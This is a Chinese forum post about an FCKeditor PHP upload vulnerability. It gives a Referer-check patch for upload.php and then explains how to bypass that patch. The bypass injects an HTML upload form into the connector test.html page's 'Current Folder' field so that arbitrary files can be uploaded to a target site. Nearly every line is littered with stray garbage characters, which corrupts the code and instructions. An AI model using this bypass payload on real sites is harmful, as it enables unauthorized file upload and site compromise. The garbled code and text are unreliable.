漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
( f p1 O# r1 Y网上给出的修复方案是0 ?! T G% t4 r L, u
修复方法,删除FCK编辑器用其他的编辑器8 T" P* \, |0 B% v
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件& _# [4 \: s% X" q! b* u6 P$ N
在
9 N: ~9 m. Q) \7 |( Mrequire(‘config.php’);
5 Y/ Z) t M3 ~) orequire(‘util.php’);
) b) S% J5 k4 Q的下面添加以下代码—————————–
9 N7 f( `$ B A. q//防止外部提交
# B- p/ ]; K; q5 hfunction outsidepost()
5 o8 a( E: R' {- w7 R* M{, B1 n& q V8 z+ R& N6 Y
$servername=$_SERVER['SERVER_NAME'];
+ [0 h: E2 L! K7 B' U, F$sub_from=@$_SERVER['HTTP_REFERER'];4 b) w9 b, m2 G9 o& K1 T, I
$sub_len=strlen($servername);4 J0 l* i& l. b
$checkfrom=substr($sub_from,7,$sub_len);: S1 H; T( x" ]0 r- i1 F3 J
if($checkfrom!=$servername){1 n& D1 b. ^* L: {" [
echo(“you don’t outsidepost!”);6 X, v9 P; X& f* \ }9 }; O+ r+ ?
exit;- \4 K, J o0 A
}! W2 q* X" M3 X0 O1 b
}9 u5 z! ?' c) w: h5 T8 h
outsidepost();( q) w7 J0 @2 K- E# L
防止外部提交,但是没有防止内部提交,0 G7 C! F# K; V0 ]! H% \- ~8 X3 o+ X
利用方法:7 D# s. q8 i1 Q; ~
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html0 K8 L1 \. {! ]( A W
2,在Current Folder 框输入% b+ ^4 G# b5 A3 R0 y
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
: I3 K( o' }/ R然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
; ~5 R# t/ x$ \* e UPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对